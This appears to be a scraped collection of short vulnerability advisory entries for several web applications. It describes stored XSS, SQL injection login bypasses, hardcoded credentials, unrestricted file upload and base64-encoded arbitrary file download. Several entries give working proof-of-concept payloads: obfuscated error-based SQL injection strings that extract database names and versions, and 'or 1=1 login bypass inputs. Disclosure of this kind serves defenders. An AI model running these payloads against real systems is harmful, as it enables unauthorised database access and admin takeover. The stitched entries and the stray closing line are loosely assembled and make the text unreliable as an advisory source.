NethServer suffers from an authenticated stored XSS vulnerability. Input passed to the 'BackupConfig[Upload][Description]' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
An attacker is able to inject malicious SQL query to bypass the login page and login as admin of the particular school. The attacker can set the username and password to 'admin' or 1=1 -- - and select the check box as management.
SQL Injection vulnerability exists in the file /wbg/core/_includes/authorization.inc.php due to lack of input validation. Hardcoded admin user credentials are present in the same file. Full path disclosure vulnerability exists due to lack of input validation in almost any file. Unrestricted file upload can be done via admin panel as attachment to any publication without any file type checking.
The vulnerability allows an attacker to upload arbitrary files. Users profile picture arbitrary file can be uploaded. The vulnerable source code is provided in the text.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game=[SQL] 1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31 Etc..
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/go.php?id=[SQL] http://localhost/[PATH]/admin-delete.php?id=[SQL] 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
The security obligation allows an attacker to arbitrary download files. The vulnerable source code allows an attacker to access any file on the server by encoding the file name in base64 and passing it as a parameter to the download.php file.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin.php User: 'or 1=1 or ''=' Pass: anything http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- Etc...
Services By CQR